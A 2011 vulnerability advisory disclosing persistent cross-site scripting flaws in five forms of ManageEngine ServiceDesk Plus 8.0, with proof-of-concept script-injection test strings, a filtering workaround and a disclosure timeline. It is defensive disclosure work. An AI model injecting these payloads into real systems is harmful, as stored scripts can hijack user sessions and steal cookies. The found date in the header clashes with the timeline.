======================================================================= Secur-I Research Group Security Advisory [ SV-2011-003] ======================================================================= Title: ManageEngine ServiceDesk Plus 8.0 Build 8013 Multiple Persistence Cross Site Scripting Vulnerabilities Product: ServiceDesk Plus Vulnerable version: 8.0 Build 8013 (Other versions could also be affected) Fixed version: N/A Impact: Medium Homepage: http://www.manageengine.com/ Vulnerability ID: SV-2011-003 Found: 2011-07-08 By: Narendra Shinde Secur-I Research Group http://securview.com/ ======================================================================= Vendor description: ------------------- ServiceDesk Plus integrates your help desk requests and assets to help you manage your IT effectively. It helps you implement ITIL best practices and troubleshoot IT service requests faster. ServiceDesk Plus is highly customizable, easy-to-implement help desk software. More than 10,000 IT managers worldwide use ServiceDesk Plus to manage their IT help desk and assets.ServiceDesk Plus is available in 23 different languages. Source: http://www.manageengine.com/products/service-desk/ Vulnerability Information: ------------------------- Class: Improper Neutralization of Input during Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Insertion and Execution of malicious scripts in user browser Remotely Exploitable: Yes Authentication Required: Yes User interaction Required : Yes Vulnerability overview/description: ----------------------------------- ServiceDesk Plus version 8.0 Build 8013 is prone to multiple persistent cross-site scripting vulnerabilities as the user-supplied input received via certain parameters is not properly sanitized. This can be exploited by submitting specially crafted input to the affected software. Successful exploitation could allow the attacker to execute arbitrary script code within the user's browser session in the security context of the targeted site. The attacker could gain access to user's cookies (including authentication cookies), if any, associated with the targeted site, access recently submitted data by the target user via web forms, or take actions on the site masquerading as the target user. Proof-of-Concept(PoC): a) URL: http://vulnerableserver/SetUpWizard.do?forwardTo=technician&fromModule=QuickAction Action: Configuration wizard - Add New Technician Vulnerable Parameter: Name Test string used: '><script>alert('SecurView')</scrip b) URL: http://vulnerableserver/SiteDef.do Action: Add a new site Vulnerable Parameter: Site name Test string used: '><script>alert('SecurView')</script> c) URL: http://vulnerableserver/GroupResourcesDef.do Action: Create Group Vulnerable Parameter: Group Name Test string used: '><script>alert('SecurView')</script> d) URL: http://vulnerableserver/LicenseAgreement.do?operation=newagreement Action: Add new license agreement Vulnerable Parameter: Agreement Number Test string used: '><script>alert('SecurView')</script> e) URL: http://vulnerableserver/ManualNodeAddition.do?isServer=true Action: Server Configuration - Computer Vunlerable parameter: Name Test string used: '><script>alert('Securview')</script> Workaround: ----------- Proper user input filtering. For more details please refer: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet Timeline: --------- Vulnerability Found : 14/7/2011 Reported to Vendor : 14/7/2011 Confirmation from vendor : 19/7/2011 Public Disclosure : 29/7/2011 Thanks & Regards, Narendra. Confidentiality: This e-mail and any attachments may be confidential and may also be privileged. If you are not an intended named recipient, please notify the sender immediately and do not disclose the contents to another person use it for any purpose, or store or copy the information in any medium.